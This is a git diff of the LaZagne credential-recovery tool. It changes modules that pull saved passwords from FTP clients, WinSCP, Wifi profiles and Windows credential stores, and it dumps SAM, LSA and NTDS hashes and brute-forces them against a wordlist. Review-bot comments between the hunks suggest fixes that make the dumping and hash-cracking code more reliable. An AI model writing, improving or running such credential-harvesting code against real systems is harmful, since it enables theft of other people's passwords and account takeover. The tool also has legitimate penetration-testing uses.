a/Windows/src/LaZagne/softwares/svn/tortoise.py b/Windows/src/LaZagne/softwares/svn/tortoise.py index 4ca96e72..9f131507 100644 --- a/Windows/src/LaZagne/softwares/svn/tortoise.py +++ b/Windows/src/LaZagne/softwares/svn/tortoise.py @@ -13,7 +13,7 @@ def __init__(self): # main function def run(self): # print title - Header().title_debug('Tortoise') + Header().title_info('Tortoise') file_path = '' if 'APPDATA' in os.environ: diff --git a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py index a16dbec8..f1c51278 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py +++ b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py 
@@ -25,7 +25,8 @@ def get_key_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False num_profiles = win32api.RegQueryInfoKey(key)[0] @@ -49,14 +50,15 @@ def get_key_info(self): if k[0] == 'PW': try: values['Password'] = self.decrypt(k[1]) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['Password'] = 'N/A' # print the results print_output('CoreFTP', pwdFound) def run(self): # print title - Header().title_debug('CoreFTP') + Header().title_info('CoreFTP') if self.get_key_info() == False: print_debug('INFO', 'CoreFTP not installed') diff --git a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py index d0b8c260..56c92346 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py +++ b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py @@ -46,15 +46,16 @@ def parse_xml(self, xml_file): values['Password'] = password pwdFound.append(values) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + # print the results print_output("Cyberduck", pwdFound) # main function def run(self): # print title - Header().title_debug('Cyberduck') + Header().title_info('Cyberduck') path = self.get_path() if path == 'CYBERDUCK_NOT_EXISTS': diff --git a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py index 180257db..c50355ff 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py +++ b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py @@ -1,5 +1,5 @@ import xml.etree.cElementTree as ET -import os +import os, base64 from config.constant import * from config.write_output import print_output, print_debug from config.header import Header 
@@ -12,7 +12,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Filezilla') + Header().title_info('Filezilla') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\FileZilla' @@ -39,8 +39,7 @@ def run(self): pwdFound = [] for i in range(len(interesting_xml_file)): - print_debug('INFO', interesting_xml_file[i]) - print_debug('INFO', info_xml_file[i] + '\n') + print_debug('INFO', '%s: %s' % (interesting_xml_file[i], info_xml_file[i])) xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i]) @@ -66,7 +65,15 @@ def run(self): values['Login'] = s11.text if s11.tag == 'Pass': - values['Password'] = s11.text + try: + # if base64 encoding + if 'encoding' in s11.attrib: + if s11.attrib['encoding'] == 'base64': + values['Password'] = base64.b64decode(s11.text) + else: + values['Password'] = s11.text + except: + values['Password'] = s11.text # password found if len(values) != 0: diff --git a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py index b53d2892..fe6427c7 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py +++ b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py @@ -44,11 +44,13 @@ def read_file(self, filepath): def run(self): # print title - Header().title_debug('FTP Navigator') + Header().title_info('FTP Navigator') - path = "C:\\FTP Navigator\\Ftplist.txt" - if os.path.exists(path): - self.read_file(path) - else: - print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path) + if 'HOMEDRIVE' in os.environ: + path = os.environ.get('HOMEDRIVE') + os.sep + 'FTP Navigator\\Ftplist.txt' + + if os.path.exists(path): + self.read_file(path) + else: + print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path) diff --git a/Windows/src/LaZagne/softwares/sysadmin/puttycm.py b/Windows/src/LaZagne/softwares/sysadmin/puttycm.py index 9c674fff..a96440c8 100644 
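Review bot: In the `Pass` branch added to `run`, one path leaves `values['Password']` unassigned: the single `else` pairs with only one of the two nested `if`s (indentation is lost on this page, so which one cannot be confirmed), so either an `encoding` value other than `base64` or a missing attribute falls through. The bare `except:` also hides a decode failure, unlike the handlers this commit converts elsewhere. A flat form covers every case: `enc = s11.attrib.get('encoding')` followed by `values['Password'] = base64.b64decode(s11.text) if enc == 'base64' else s11.text`, with the handler logging through `print_debug('DEBUG', '{0}'.format(e))`. The loop enclosing this branch starts and ends outside the hunk.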
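Review bot: When `HOMEDRIVE` is absent from the environment, the rewritten `run` in ftpnavigator.py either reports nothing at all or, if the `os.path.exists(path)` check sits outside the new `if` (not recoverable from this page), fails with NameError on the unbound `path`. Reading the variable once with `drive = os.environ.get('HOMEDRIVE')` and returning early with an INFO message when it is empty makes the skipped check visible. The re-added message also keeps the typo `Paht`; it should read `'Path %s does not exist...'`.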
--- a/Windows/src/LaZagne/softwares/sysadmin/puttycm.py +++ b/Windows/src/LaZagne/softwares/sysadmin/puttycm.py @@ -13,11 +13,12 @@ def __init__(self): def run(self): # print title - Header().title_debug('Puttycm') + Header().title_info('Puttycm') try: database_path = self.get_default_database() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('INFO', 'Puttycm not installed') return diff --git a/Windows/src/LaZagne/softwares/sysadmin/winscp.py b/Windows/src/LaZagne/softwares/sysadmin/winscp.py index e802825a..92b02759 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/winscp.py +++ b/Windows/src/LaZagne/softwares/sysadmin/winscp.py @@ -55,7 +55,8 @@ def check_winscp_installed(self): try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead) return True - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False def check_masterPassword(self): @@ -72,7 +73,8 @@ def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False num_profiles = win32api.RegQueryInfoKey(key)[0] @@ -107,7 +109,8 @@ def get_logins_info(self): port = '22' try: password = self.decrypt_password() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) password = 'N/A' values['Hostname'] = self.get_hostname() @@ -139,7 +142,8 @@ def decrypt_password(self): try: result += chr(int(self.decrypt_char())) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) pass if flag == hex_flag: 
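Review bot: In `decrypt_password` the converted handler logs the failure but still skips the character, so the loop goes on and returns a shorter string with nothing marking it as incomplete; the `pass` left after `print_debug` is dead code. The caller in `get_logins_info` (the `@@ -107,7 +109,8 @@` hunk) already maps an exception to `'N/A'`, so logging and then re-raising with a bare `raise` would report the entry as undecodable rather than partially decoded. At minimum drop the `pass`. The function starts and ends outside the hunk.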
@@ -151,7 +155,7 @@ def decrypt_password(self): # --------- Main function --------- def run(self): # print title - Header().title_debug('WinSCP') + Header().title_info('WinSCP') if self.check_winscp_installed(): if not self.check_masterPassword(): diff --git a/Windows/src/LaZagne/softwares/wifi/wifi.py b/Windows/src/LaZagne/softwares/wifi/wifi.py index 2d7c8147..4af7bc1e 100644 --- a/Windows/src/LaZagne/softwares/wifi/wifi.py +++ b/Windows/src/LaZagne/softwares/wifi/wifi.py @@ -15,10 +15,10 @@ def __init__(self): def run(self): # print title - Header().title_debug('Wifi') + Header().title_info('Wifi') if not windll.Shell32.IsUserAnAdmin(): - print_debug('ERROR', '[!] This script should be run as admin!') + print_debug('WARNING', '[!] This script should be run as admin!') return else: @@ -36,7 +36,8 @@ def run(self): print_debug('INFO', '[!] Trying to elevate our privilege') get_system_priv() print_debug('INFO', '[!] Elevation ok - Passwords decryption is in progress') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted') time.sleep(5) diff --git a/Windows/src/LaZagne/softwares/windows/dot_net.py b/Windows/src/LaZagne/softwares/windows/dot_net.py index 611ad350..a2ba1847 100644 --- a/Windows/src/LaZagne/softwares/windows/dot_net.py +++ b/Windows/src/LaZagne/softwares/windows/dot_net.py @@ -35,7 +35,8 @@ def get_creds(self): try: creds = win32cred.CredEnumerate(None, 0) return creds - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return None def get_entropy(self): @@ -59,7 +60,7 @@ def Win32CryptUnprotectData(self, cipherText, entropy): def run(self): # print title - Header().title_debug('Dot Net Passport') + Header().title_info('Dot Net Passport') a = self.get_creds() pwd = '' 
@@ -76,7 +77,8 @@ def run(self): values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/windows/network.py b/Windows/src/LaZagne/softwares/windows/network.py index 5db390a6..f6eef4a1 100644 --- a/Windows/src/LaZagne/softwares/windows/network.py +++ b/Windows/src/LaZagne/softwares/windows/network.py @@ -34,7 +34,8 @@ def get_creds(self): try: creds = win32cred.CredEnumerate(None, 0) return creds - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return None def get_entropy(self): @@ -60,7 +61,7 @@ def Win32CryptUnprotectData(self, cipherText, entropy): def run(self): # print title - Header().title_debug('Generic Network') + Header().title_info('Generic Network') os_plateform = platform.release() @@ -91,7 +92,8 @@ def run(self): try: values['Password'] = pwd.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/windows/secrets.py b/Windows/src/LaZagne/softwares/windows/secrets.py index 4f2391e5..5aa51e17 100644 --- a/Windows/src/LaZagne/softwares/windows/secrets.py +++ b/Windows/src/LaZagne/softwares/windows/secrets.py 
@@ -33,13 +33,13 @@ def delete_existing_systemFiles(self): def run(self): # Need admin privileges if not windll.Shell32.IsUserAnAdmin(): - if logging.getLogger().isEnabledFor(logging.DEBUG) == True: - Header().title_info('Windows Secrets') - print_debug('ERROR', '[!] This script should be run as admin!') + if logging.getLogger().isEnabledFor(logging.INFO) == True: + Header().title('Windows Secrets') + print_debug('WARNING', '[!] This script should be run as admin!') return # print the title - Header().title_info('Windows Secrets') + Header().title('Windows Secrets') # if hives already exists if self.check_existing_systemFiles(): diff --git a/Windows/src/LaZagne/softwares/windows/secretsdump.py b/Windows/src/LaZagne/softwares/windows/secretsdump.py index 09b357ad..7ab06a8c 100644 --- a/Windows/src/LaZagne/softwares/windows/secretsdump.py +++ b/Windows/src/LaZagne/softwares/windows/secretsdump.py @@ -48,11 +48,11 @@ from collections import OrderedDict import win32con, win32security, win32net import binascii -from softwares.browsers.dico import get_dico -from config.write_output import print_debug, checks_write -import WConio -import logging +from config.dico import get_dico +from config.write_output import print_debug, print_output +# import logging from config.constant import * +from config.header import Header import sys import random @@ -640,7 +640,7 @@ def __printSecret(self, name, secretItem): values['password'] = password else: # Default print, hexdump - values['hex'] = secretItem.encode('hex') + values['password in hex'] = secretItem.encode('hex') # hexdump(secretItem) self.__secretItems.append(values) @@ -988,6 +988,7 @@ def __init__(self, address, system=False, security=False, sam=False, ntds=False, self.__noLMHash = True self.__isRemote = False self.categoryName = '' + self.wordlist = get_dico() + constant.passwordFound def getBootKey(self): # Local Version whenever we are given the files directly 
@@ -1040,54 +1041,39 @@ def create_nthash(self, word): def bruteForce_Hash(self, hash): # check with a basic dictionary list and with all passwords already found - wordlist = get_dico() + constant.passwordFound - for word in wordlist: + for word in self.wordlist: generated_hash = self.create_nthash(word) if generated_hash == hash: return word return False - def print_hashes(self, category, content): - if category == 'title': - WConio.textcolor(WConio.WHITE) - logging.info('%s\n' % content) - WConio.textcolor(WConio.LIGHTGREY) - self.categoryName = content + def hashes_to_dic(self, title, format, content): + Header().title1(title) + print_debug('INFO', 'Format: (%s)' % format) - elif category == 'hashes': - accounts = [] - items = sorted(content) - toWrite = "############ %s passwords ############\r\n\r\n" % self.categoryName - for item in items: - hash = content[item] - toWrite += hash + '\r\n' - logging.info('%s' % hash) - (uid, rid, lmhash, nthash) = hash.split(':')[:4] - password = self.bruteForce_Hash(nthash) - if password: - accounts.append((uid, password)) - # if the bruteforce attacks worked - if accounts: - logging.info('\n') - print_debug("OK", "Password found !!!") - toWrite += '\r\n- Password in cleartext\r\n' - for account in accounts: - constant.nbPasswordFound += 1 - (user, password) = account - toWrite += '%s: %s\r\n' % (user, password) - logging.info('%s: %s' % (user, password)) - logging.info('\n') - toWrite += '\r\n' - open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(toWrite) + items = sorted(content) + pwdFound = [] + values = {} - elif category == 'secrets': - for secret in content: - print_debug("OK", "Password found !!!") - constant.nbPasswordFound += 1 - for s in secret.keys(): - logging.info('%s: %s' % (s, secret[s])) - logging.info('\n') - checks_write(content, self.categoryName) + all_hash = '\r\n' + for item in items: + hash = content[item] + (uid, rid, lmhash, nthash) = hash.split(':')[:4] + 
self.wordlist.append(uid.encode("utf8")) + all_hash = '%s\r\n%s' % (all_hash, hash) + password = self.bruteForce_Hash(nthash) + + # if a password has been found from the dictionary attack + if password: + accounts = {} + accounts['Category'] = 'System account' + accounts['user'] = uid + accounts['password'] = password + pwdFound.append(accounts) + + values['hashes'] = all_hash + pwdFound.append(values) + return pwdFound def dump(self): try: @@ -1101,8 +1087,8 @@ def dump(self): self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote) samHashes_tab = self.__SAMHashes.dump() if samHashes_tab: - self.print_hashes('title', '[*] Local SAM hashes (uid:rid:lmhash:nthash') - self.print_hashes('hashes', samHashes_tab) + pwdFound = self.hashes_to_dic('Local SAM hashes', 'uid:rid:lmhash:nthash', samHashes_tab) + print_output('Local SAM hashes', pwdFound, True) # -------------- LSA SECRETS -------------- SECURITYFileName = self.__securityHive 
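Review bot: `hashes_to_dic` names a parameter `format` and a local `hash`, both shadowing builtins, and its unpack `(uid, rid, lmhash, nthash) = hash.split(':')[:4]` assumes the SAM layout although `dump` also calls it with the layout `uid:encryptedHash:longDomain:domain`. For that second caller the variables `rid`, `lmhash` and `nthash` hold fields of a different record format, and a line with fewer than four fields raises ValueError that nothing in this method catches. Renaming to `fmt` and `line` (both call sites shown pass the argument positionally) and guarding with `fields = line.split(':')` then `if len(fields) < 4: continue` keeps the method from mislabelling or aborting on such input. A docstring stating the expected record layout and the returned list of dicts would also help, since the final `values` entry differs in shape from the account entries.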
@@ -1111,21 +1097,21 @@ def dump(self): # --- Cached Hashes --- cachedHashes = self.__LSASecrets.dumpCachedHashes() if cachedHashes: - self.print_hashes('title', '[*] Cached domain logon information (uid:encryptedHash:longDomain:domain)') - self.print_hashes('hashes', cachedHashes) + pwdFound = self.hashes_to_dic('Cached domain logon information', 'uid:encryptedHash:longDomain:domain', cachedHashes) + print_output('Cached domain logon information', pwdFound, True) # --- LSA Secrets --- secrets = self.__LSASecrets.dumpSecrets() if secrets: - self.print_hashes('title', '[*] LSA Secrets') - self.print_hashes('secrets', secrets) + Header().title1('LSA Secrets') + print_output('LSA Secrets', secrets, True) # -------------- NTDS File -------------- NTDSFileName = self.__ntdsFile self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote = self.__isRemote, history = self.__history, noLMHash = self.__noLMHash) ntdsHashes_dic = self.__NTDSHashes.dump() if ntdsHashes_dic: - self.print_hashes('title', '[*] NTDS File') + Header().title1('NTDS File') for nts_keys in ntdsHashes_dic.keys(): hashesFound = ntdsHashes_dic[nts_keys] if nts_keys == 'ntds': @@ -1133,8 +1119,8 @@ def dump(self): for item in items: try: hashesFound[item] - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) elif nts_keys == 'ntds.kerberos': for itemKey in hashesFound: print itemKey diff --git a/Windows/standalone/laZagne.exe b/Windows/standalone/laZagne.exe deleted file mode 100644 index d860feb1..00000000 Binary files a/Windows/standalone/laZagne.exe and /dev/null differ diff --git a/pictures/softwares.png b/pictures/softwares.png index 1421a71a..ae3bf1ed 100644 Binary files a/pictures/softwares.png and b/pictures/softwares.png differ
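Review bot: In the `ntds` branch of `dump`, `hashesFound[item]` is evaluated and discarded, so the `try` only tests that the key exists and the new DEBUG handler can log nothing but a lookup error (assuming `items` is derived from `hashesFound`, which is set outside the hunk). The `ntds.kerberos` branch still uses a bare `print itemKey`, which writes key material to stdout regardless of the verbosity level this commit introduces. Replacing it with `print_debug('INFO', itemKey)` puts it under the same verbosity control as the rest of the module, and the no-op loop should either be removed or given a comment saying why it is kept. `dump` continues outside the hunk.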